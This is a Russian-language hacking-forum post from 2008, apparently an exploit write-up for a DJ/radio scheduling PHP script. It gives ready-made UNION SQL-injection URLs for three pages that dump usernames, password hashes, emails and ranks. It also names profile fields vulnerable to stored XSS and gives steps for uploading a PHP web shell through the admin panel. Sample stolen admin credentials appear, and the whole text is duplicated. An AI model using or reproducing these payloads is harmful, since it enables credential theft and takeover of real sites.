~!DoK_tOR!~
27.09.2008, 14:28
Офф.сайт: www.quickscriptz.ca.kz
Префикс таблиц бд: rp_
Табличка: rp_users
Клонки: djname,username,passwrd,email,rank,id
Админка: http://localhost/admin/
[SQL-Injection]
Сценарий timetable.php
Эксплойт:
http://localhost/[installdir]/timetable.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,p asswrd,email,rank),user(),version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+r p_users+where+id=1/*
Уязвимого кода предоставить не могу так как всё закодированно в base64(кому надо тот раскодирует).
Смотреть в исходнике
<td width='150px' align='center'>12:00 - 01:00 AM</td>
<td width='150px' align='center'><b><font color='black'>DJ admin:admin:92ceae43616aa3a8cfde62e236ccc657:admin @admin.ru:Administrator</font></b><td>
Сценарий timetable_public.php
Эксплойт:
http://localhost/[installdir]/timetable_public.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,p asswrd,email,rank),user(),version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+r p_users+where+id=1/*
Сценарий viewprofile.php
Эксплойт:
http://localhost/[installdir]/viewprofile.php?dj=-1'+union+select+concat_ws(0x3a,djname,username,pas swrd,email,rank),user(),version(),4,5,6,7,8,9,10,1 1+from+rp_users+where+id=1/*
[XSS Active]
В профиле уязвимые поля: Favourite Food,Pet Peeves,Sayings,About You,Avatar URL.
[Шелл]
Panel Configuration -> Upload Files льём наш шелл с расширением .php
Шелл будет тут:
http://localhost/[installdir]/uploads/shell.php
(c) ~!Dok_tOR!~
Префикс таблиц бд: rp_
Табличка: rp_users
Клонки: djname,username,passwrd,email,rank,id
Админка: http://localhost/admin/
[SQL-Injection]
Сценарий timetable.php
Эксплойт:
http://localhost/[installdir]/timetable.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,p asswrd,email,rank),user(),version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+r p_users+where+id=1/*
Уязвимого кода предоставить не могу так как всё закодированно в base64(кому надо тот раскодирует).
Смотреть в исходнике
<td width='150px' align='center'>12:00 - 01:00 AM</td>
<td width='150px' align='center'><b><font color='black'>DJ admin:admin:92ceae43616aa3a8cfde62e236ccc657:admin @admin.ru:Administrator</font></b><td>
Сценарий timetable_public.php
Эксплойт:
http://localhost/[installdir]/timetable_public.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,p asswrd,email,rank),user(),version(),5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+r p_users+where+id=1/*
Сценарий viewprofile.php
Эксплойт:
http://localhost/[installdir]/viewprofile.php?dj=-1'+union+select+concat_ws(0x3a,djname,username,pas swrd,email,rank),user(),version(),4,5,6,7,8,9,10,1 1+from+rp_users+where+id=1/*
[XSS Active]
В профиле уязвимые поля: Favourite Food,Pet Peeves,Sayings,About You,Avatar URL.
[Шелл]
Panel Configuration -> Upload Files льём наш шелл с расширением .php
Шелл будет тут:
http://localhost/[installdir]/uploads/shell.php
(c) ~!Dok_tOR!~